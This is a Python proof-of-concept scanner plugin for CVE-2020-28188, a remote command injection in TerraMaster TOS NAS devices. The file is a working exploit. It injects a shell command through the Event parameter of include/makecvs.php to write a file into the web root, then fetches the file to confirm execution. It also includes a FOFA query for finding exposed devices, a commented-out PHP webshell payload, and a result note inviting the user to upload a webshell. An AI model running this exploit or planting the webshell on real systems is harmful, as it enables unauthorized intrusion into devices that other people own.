# !/usr/bin/env python3
# @Time    : 2020/12/25
# @Author  : caicai
# @File    : poc_terramaster_rce_cve-2020-28188.py

'''
fofa:
body="TOS Loading" && title!="- CoreAPI"
'''
from myscan.lib.helper.request import request
from myscan.lib.parse.dictdata_parser import dictdata_parser
from myscan.config import scan_set
from myscan.lib.core.common import get_random_str
from myscan.lib.parse.response_parser import response_parser  ##写了一些操作resonse的方法的类
import time


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "terramaster_rce"
        self.vulmsg = "link:https://forum.ywhack.com/viewthread.php?tid=114868"
        self.level = 3  # 0:Low  1:Medium 2:High

    def verify(self):
        # 添加限定条件
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        self.parser = dictdata_parser(self.dictdata)
        filename = get_random_str(4) + ".txt"
        random_str = get_random_str(10)
        # payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/" + shell_filename + " && chmod +x /usr/www/" + shell_filename + "||"
        payload = "http|echo \"" + random_str + "\" >> /usr/www/" + filename + " && chmod +x /usr/www/" + filename + "||"
        req = {
            "method":"GET",
            "url": self.url + "include/makecvs.php?Event=" + payload,
            "verify": False,
            "timeout": 10,
        }
        r = request(**req)
        time.sleep(1)
        if r is not None and r.status_code == 200 and b"Service,DateTime" in r.content:
            req["url"] = self.url + filename
            r1 = request(**req)
            if r1 is not None and random_str.encode() in r1.content:
                parser1 = response_parser(r1)
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low  1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "others": "you can upload your webshell",
                        "request": parser1.getrequestraw(),
                        "response": parser1.getresponseraw()
                    }
                })
